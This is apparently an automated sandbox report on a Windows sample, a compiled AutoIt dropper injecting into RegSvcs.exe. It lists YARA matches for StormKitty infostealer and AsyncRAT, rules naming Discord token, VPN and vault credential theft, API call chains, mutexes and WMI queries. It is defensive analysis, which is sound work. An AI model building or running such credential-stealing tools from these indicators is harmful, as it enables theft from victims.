Source: 7.2.RegSvcs.exe.790000.0.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 7.2.RegSvcs.exe.790000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 7.2.RegSvcs.exe.790000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 7.2.RegSvcs.exe.790000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.RegSvcs.exe.790000.0.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000007.00000002.2521728981.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: 6mllsKaB2q.exe PID: 7068, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 7216, type: MEMORYSTR	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 7216, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen

Binary is likely a compiled AutoIt script file

Source: 6mllsKaB2q.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 6mllsKaB2q.exe, 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_0b6083ca-f
Source: 6mllsKaB2q.exe, 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_0dc19fb8-5
Source: 6mllsKaB2q.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_98ecbc5d-c
Source: 6mllsKaB2q.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_0af5b0c3-8

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

Code function: 1_2_00C1D5EB: CreateFileW,DeviceIoControl,CloseHandle,

1_2_00C1D5EB

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

Code function: 1_2_00C11201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

1_2_00C11201

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

Code function: 1_2_00C1E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

1_2_00C1E8F6

Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00C22046	1_2_00C22046
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00BB8060	1_2_00BB8060
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00C18298	1_2_00C18298
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00BEE4FF	1_2_00BEE4FF
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00BE676B	1_2_00BE676B
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00C44873	1_2_00C44873
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00BDCAA0	1_2_00BDCAA0
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00BBCAF0	1_2_00BBCAF0
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00BCCC39	1_2_00BCCC39
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00BE6DD9	1_2_00BE6DD9
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00BB91C0	1_2_00BB91C0
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00BCB119	1_2_00BCB119
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00BD1394	1_2_00BD1394
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00BD1706	1_2_00BD1706
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00BD781B	1_2_00BD781B
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00BD19B0	1_2_00BD19B0
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00BB7920	1_2_00BB7920
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00BC997D	1_2_00BC997D
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00BD7A4A	1_2_00BD7A4A
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00BD7CA7	1_2_00BD7CA7
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00BD1C77	1_2_00BD1C77
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00BE9EEE	1_2_00BE9EEE
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00C3BE44	1_2_00C3BE44
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00BD1F32	1_2_00BD1F32
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00FB2000	1_2_00FB2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00A36390	7_2_00A36390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00A35AC0	7_2_00A35AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00A39760	7_2_00A39760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00A35778	7_2_00A35778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00A39750	7_2_00A39750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_053505F0	7_2_053505F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05350600	7_2_05350600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0535C108	7_2_0535C108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0535C0F7	7_2_0535C0F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0535C0D1	7_2_0535C0D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05355D60	7_2_05355D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05355D52	7_2_05355D52

Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: String function: 00BD0A30 appears 46 times
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: String function: 00BB9CB3 appears 31 times
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: String function: 00BCF9F2 appears 40 times

Source: 6mllsKaB2q.exe, 00000001.00000003.1302327810.00000000037CD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 6mllsKaB2q.exe
Source: 6mllsKaB2q.exe, 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClient.exe. vs 6mllsKaB2q.exe
Source: 6mllsKaB2q.exe, 00000001.00000003.1302624328.0000000003623000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 6mllsKaB2q.exe

Source: 6mllsKaB2q.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 1.2.6mllsKaB2q.exe.dc0000.1.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 1.2.6mllsKaB2q.exe.dc0000.1.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 1.2.6mllsKaB2q.exe.dc0000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 1.2.6mllsKaB2q.exe.dc0000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 1.2.6mllsKaB2q.exe.dc0000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 1.2.6mllsKaB2q.exe.dc0000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 1.2.6mllsKaB2q.exe.dc0000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 7.2.RegSvcs.exe.790000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 7.2.RegSvcs.exe.790000.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 7.2.RegSvcs.exe.790000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 7.2.RegSvcs.exe.790000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 7.2.RegSvcs.exe.790000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 7.2.RegSvcs.exe.790000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.RegSvcs.exe.790000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000007.00000002.2521728981.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: 6mllsKaB2q.exe PID: 7068, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: RegSvcs.exe PID: 7216, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: RegSvcs.exe PID: 7216, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@19/141@5/5

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

Code function: 1_2_00C237B5 GetLastError,FormatMessageW,

1_2_00C237B5

Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00C110BF AdjustTokenPrivileges,CloseHandle,		1_2_00C110BF
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00C116C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		1_2_00C116C3

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

Code function: 1_2_00C251CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

1_2_00C251CD

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

Code function: 1_2_00C3A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

1_2_00C3A67C

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

Code function: 1_2_00C2648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

1_2_00C2648E

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

Code function: 1_2_00BB42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

1_2_00BB42A2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File created: C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

File created: C:\Users\user~1\AppData\Local\Temp\aut99DF.tmp

Jump to behavior

Source: 6mllsKaB2q.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
